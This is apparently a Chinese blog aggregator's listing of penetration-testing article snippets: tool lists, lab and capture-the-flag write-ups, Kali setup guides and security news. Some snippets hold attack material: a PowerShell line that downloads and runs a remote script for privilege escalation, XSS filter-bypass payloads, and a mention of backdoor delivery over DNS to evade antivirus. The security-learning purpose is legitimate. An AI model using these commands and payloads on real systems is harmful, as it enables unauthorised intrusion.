PenTest

有了这123个Python黑客工具,再也不用问女朋友要手机密码了

今天的文章来源于dloss/python-pentest-tools,本文中列举了123个Python渗透测试工具,当然不仅于渗透~下面我们就开始吧~————————————————————————如果你想参与漏洞研究
妄心xyx·2019-12-30 08:36

学习kail linux 几个不错的网站

KaliLinux秘籍:wizardforcel/kali-linux-cookbook-zh-码云-开源中国KaliLinuxWeb渗透秘籍:wizardforcel/kali-linux-web-pentest-cookbook-zh
逐风浪子·2019-12-27 10:00

modbus协议初探

modbuspentest近年来,基于SCADA(过程控制网络)的系统已经从专有封闭网络转向开源解决方案和支持TCP/IP的网络。这使他们容易受到我们传统计算机网络面临的相同安全漏洞的攻击。
城市烈人·2019-12-25 08:25

iOS mac上用终端写代码并调试

显示当前目录下面的所有子目录$ls2.进入桌面$cdDesktop/3.创建test.c文件$touchtest.c4.打开test.c文件(然后你自己在.c文件中写你需要运行的代码,之后保存关掉文件就好了)$opentest.c5
石虎132·2019-12-25 00:59

域环境的搭建

AD域的搭建参考:https://github.com/l3m0n/pentest_studywin2008主控hostname:win2008ip:192.168.43.200/24网关:192.168.43.1win2003
冬泳怪鸽·2019-12-13 15:00

Ubuntu 安装MSF

详细教程https://www.pentestgeek.com/tools/how-to-install-metasploit-framework-ubuntu-14-04建议均在非root账户下运行安装
g0·2019-12-12 12:54

Cypress简介

save-devcypressvimpackage.json{"scripts":{"e2e:open":"cypressopen","e2e:run":"cypressrun"},}npmrune2e:openTestingvimcypress
诺之林·2019-12-07 13:15

Pentest BOX安装和使用

0x01PentestBOXPentestBox:渗透测试盒子,是一款Windows平台下预配置的便携式开源渗透测试环境,而它也是著名黑客Kapustkiy常用的工具之一。
Hell0_C·2019-12-06 09:30

[Linux] nginx记录多种响应时间

startingwhenNGINXreadsthefirstbytefromtheclientandendingwhenNGINXsendsthelastbyteoftheresponsebody$upstream_connect_time–Timespentestablishingaconnectionwithanupstrea
陶士涵·2019-12-03 19:00

Android 渗透测试学习手册(二)准备实验环境

本文由看雪学院飞龙使者编译原文:LearningPentestingforAndroidDevices作者:AdityaGupta在上一章中,我们了解了Android安全性及其体系结构的基础知识。
看雪学院·2019-11-29 18:17

PTES渗透测试执行标准

渗透测试注意事项:1:测试一定要获得授权方才能进行,切勿进行恶意攻击2:不要做傻事3:在没有获得书面授权时,切勿攻击任何目标4:考虑你的行为将会带来的后果5:天网恢恢疏而不漏渗透测试执行标准http://www.pentest-standard.org
北纬星辰-·2019-11-14 10:00

Android 渗透测试学习手册(四)对 Android 设备进行流量分析

本文由看雪学院飞龙使者编译原文:LearningPentestingforAndroidDevices作者:AdityaGupta在本章中,我们将研究Android设备的网络流量,并分析平台和应用程序的流量数据
看雪学院·2019-11-06 08:02

NativePayload_DNS,通过DNS流量,绕过防病毒传输后门

通过DNS流量和绕过防病毒传输的后门有效负载的C#代码由DamonMohammadbagher发表警告:此代码发布用于解释针对Pentesters和安全研究人员的反病毒漏洞欲了解更多信息,请一步一步访问以下链接
一点也不想吃辣·2019-11-06 03:59

关于物联网安全渗透的一些网站

Blogsforiotpentesthttp://iotpentest.com/https://blog.attify.comhttps://payatu.com/blog/http://jcjc-dev.com
APT-101·2019-10-18 17:00

多模块渗透测试框架PTF

ThePenTestersFramework(PTF)是一个针对Debian/Ubuntu/ArchLinux开发设计的Python脚本,在PTF的帮助下,研究人员可以根据自己的需要创建一个专用于渗透测试的小型发行版系统平台
TENCENTSYS·2019-09-28 10:12

Open TestCon 正式落户北京,演讲议题征集现已火热开放!

原文链接:https://opentestcon.org/今天,我们很高兴的分享,在所有人的共同努力下,北京从候选城市中脱颖而出,正式成为2020年OpenTestCon大会的主办城市!
技术无边·2019-08-29 08:03

basic-pentesting-1 靶机提权

原文链接:http://www.cnblogs.com/micr067/p/11396105.html原文地址:https://www.payload.com.cn/basic-pentesting-1
banacyo14206·2019-08-22 18:00

basic-pentesting-1 靶机提权

原文地址:https://www.payload.com.cn/basic-pentesting-1下载地址:https://www.vulnhub.com/entry/basic-pentesting
Micr067·2019-08-22 18:00

SQLite第一课 sqlite3.exe使用教程

1).open打开数据库例子:sqlite>.opentest.db注意:>后面有点2).tables查看数据库包含的表名例子:sqlite>.tables注意:>后面有点3).schema查看数据库中所有的表的结构例子
fengyuzaitu·2019-08-15 17:26

黑客分享4G无线路由漏洞,中兴被点名批评

据BleepingComputer美国时间8月12日报道,PenTestPartners研究人员GRichter就在今年的DEFCON黑客大会上分享了自己在一些4G路由设备上找到的安全漏洞。
阳_Noob·2019-08-14 10:21

BASIC-PENTESTING-1 靶机提权

basic-pentesting-1https://www.vulnhub.com/entry/basic-pentesting-1,216/获取ip地址端口扫描,服务识别根据服务版本搜索相关漏洞通过查看漏洞利用代码我们知道该漏洞利用模块在
Micr067·2019-08-11 14:41

MS16-023提权 + 信息收集 + 静默WinPcap安装 + WinDump抓包

powershell-nop-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest
publicstr·2019-08-01 21:56

Hack The Box Web Pentest 2017

[20Points]Lernaean[by[Arrexel]问题描述:Yourtargetisnotverygoodwithcomputers.Tryandguesstheirpasswordtoseeiftheymaybehidinganything!网站首页登陆界面根据提示进行密码猜解BP爆破得到密码,同时在响应包里面得到flag[30Points]Cartographer[byArrexel
Qftm·2019-07-31 09:00

Hack The Box Web Pentest 2019

[20Points]Emdeefiveforlife[byL4mpje]问题描述:Canyouencryptfastenough?初始页面,不管怎么样点击Submit都会显示"Tooslow!"依据Html源码,编写Python脚本进行利用importrequestsimporthashlibimportreurl="http://docker.hackthebox.eu:34650/"r=req
Qftm·2019-07-30 23:00

PTF:一款多模块渗透测试框架

ThePenTestersFramework(PTF)ThePenTestersFramework(PTF)是一个针对Debian/Ubuntu/ArchLinux开发设计的Python脚本,在PTF的帮助下
systemino·2019-07-29 13:58

利用Backtrack做Wifi钓鱼

原理:sslstrip+ettercap进行数据包的截获0x01配置默认情况下,BT中的sslstrip和DHCP服务需要重新安装和设置1.安装sslstrip安装文件:/pentest/web/s
Coisini、·2019-06-06 18:11

web for pentester之command injection

webforpentester之命令执行漏洞(命令执行漏洞)开启pentester虚拟机:开启之后,输入ipconfig查看虚拟机ip地址;我这里虚拟机的ip地址为192.168.145.131;在物理机上的
花颜 จุ๊บ·2019-05-05 20:23

web for pentester之command injection

webforpentester之命令执行漏洞(命令执行漏洞)开启pentester虚拟机:开启之后,输入ipconfig查看虚拟机ip地址;我这里虚拟机的ip地址为192.168.145.131;在物理机上的
花颜 จุ๊บ·2019-05-05 20:23

web for pentester介绍与安装

webforpentester本篇介绍的是web脚本漏洞演练平台WebforPentester,在国外webforpentester很受欢迎,很多人都用这个靶场来锻炼自己的web安全技术。
花颜 จุ๊บ·2019-04-24 21:45

web for pentester介绍与安装

webforpentester本篇介绍的是web脚本漏洞演练平台WebforPentester,在国外webforpentester很受欢迎,很多人都用这个靶场来锻炼自己的web安全技术。
花颜 จุ๊บ·2019-04-24 21:45

Kali Linux 从入门到精通(一)-概论

发现系统安全弱点从攻击者的角度思考,测量安全防护有效性证明安全问题的存在,而非破坏道德约束法律3.渗透测试标准(ThePenetrationTestingExecutionStandard)PETS(http://www.pentest-standard
jayjaydream·2019-04-05 13:28

10种反弹shell方式

参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet参考链接2:https://bernardodamele.blogspot.com
青蛙爱轮滑·2019-03-30 22:52

15种下载文件的方法

转载:https://blog.netspi.com/15-ways-to-download-a-file/瑞恩甘德鲁德原创时间:2014年6月16日Pentesters经常将文件上传到受感染的盒子以帮助进行权限提升
青蛙爱轮滑·2019-03-30 19:18

Pen Test Partners:利用网络攻击倾覆船只并不难

不幸的是,根据PenTestPartners的分析,用网络攻击倾覆一艘船是一项技术要求并不高的任务。
乖巧小墨宝·2019-02-22 11:37

航运业BEC攻击猖獗

PenTestPartners研究人员发现,黑客正在利用BEC(电子邮件妥协)攻击航运业获取重要凭证,针对行业内各类雇员通过网络或者电话等形式,进行有深度的社会工程欺诈研究,甚至有可能因此破坏关键系统。
乖巧小墨宝·2019-01-10 14:49

Kali Linux 从入门到精通(一)-概论

发现系统安全弱点从攻击者的角度思考,测量安全防护有效性证明安全问题的存在,而非破坏道德约束法律3.渗透测试标准(ThePenetrationTestingExecutionStandard)PETS(http://www.pentest-standard
无涯逍遥·2019-01-02 20:56

(解读)什么是渗透测试(Penetration Testing)?

渗透测试(PenetrationTesting),也称为PenTesting,是测试计算机系统、网络或Web应用程序以发现攻击者可能利用的安全漏洞的实践。渗透测试可以通过软件应用自动化或手动执行。
梅森上校·2018-12-16 16:03

这里有123个黑客必备的Python工具!

来自:地球的外星人君链接:https://zhuanlan.zhihu.com/p/28452712今天的文章来源于dloss/python-pentest-toolshttps://github.com
程序员之家v·2018-11-29 22:00

vulnhub writeup - 持续更新

目录wakanda:10.Description1.flag1.txt2.flag2.txt3.flag3.txtFinishedTipsBasicPentesting:20.Description1.
0x4D75·2018-09-18 09:00

渗透测试常用工具

包括BurpSuite、AcunetixWebSecuritywithAcunetixVulnerabilityScanner、Sqlmap、Layer、PentestBox、Struts2漏洞检测、御剑工具集锦
the_liang·2018-09-14 21:35

Yuki Chan全自动渗透测试工具的安装及使用

工具下载地址:https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentestgithub下载慢的可以试试下面的:htt
红枫万里路·2018-09-12 10:41

web_for_pentester_I_XSS

example1:alert(1)直接弹窗example2:alert(1)大小写绕过弹窗example3:ript>alert(1)riPt>双写绕过example4:绕过对script标签的过滤,也行,当然还有很多。不过在这题里用的其实可以直接过前三个。。。。example5:prompt(1)绕过对alert()的过滤example6:prompt(1)做题过程:首先输入prompt(1)测
wuerror·2018-08-15 17:42

Pentest Wiki Part3 渗透工具

渗透测试工具渗透测试工具攻击可能是渗透测试中最迷人的部分之一了,但它通常是用暴力破解而不是精确制导来完成的。只有当你知道针对目标的一个特定漏洞很可能会成功的时候,你才应该发起一次攻击。即在利用漏洞之前,您应该知道目标是存在该漏洞的,当然,在防止特定漏洞利用的目标上可能仍会出现未知的保护措施。如果你作为一个渗透测试工程师或客户,无脑地发出大量的攻击数据是徒劳的,它们是无效请求,不会带来任何价值。首先
FLy_鹏程万里·2018-07-10 14:06

如何渗透测试以太坊 dApps

英文原文:https://arvanaghi.com/blog/pentesting-ethereum-dapps/一、前言所谓的以太坊(Ethereum)去中心化应用(decentralizedapplication
FLy_鹏程万里·2018-06-19 11:48

Kerberoast

原文:https://pentestlab.blog/2018/06/12/kerberoast/amp/描述Kerberos和ActiveDirectory如何使用服务主体名称(SPNs)的优秀文章:
招魂怪·2018-06-15 17:28

Situational Awareness

原文:https://pentestlab.blog/2018/05/28/situational-awareness/传统的内部侦察测试使用Windows内置命令,如netview、netuser等,
weixin_33749131·2018-06-15 14:39

Situational Awareness

原文:https://pentestlab.blog/2018/05/28/situational-awareness/传统的内部侦察测试使用Windows内置命令,如netview、netuser等,
招魂怪·2018-06-15 14:39

通过Pentester_Lab学习XML注入

PentesterLab是一款老外编写的Web渗透练习环境。
Mi1k7ea·2018-05-14 11:45

一次小小的内网渗透实战(无后渗透阶段)

让我们开始吧1、渗透环境配置需要材料有:pentestbox2、存活ip寻找。nmap-sP192.168.0.0/24看着这些ip是有够烦的。一个个ip看完后192
rootgeorge·2018-05-04 22:02

Web for PentesterI 代码注入-实战篇

本文主要是根据官网和网上的教程进行实战,详细讲解请参照1、https://pentesterlab.com/exercises/web_for_pentester/course2、http://www.freebuf.com
小心灵呀·2018-04-25 17:50
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他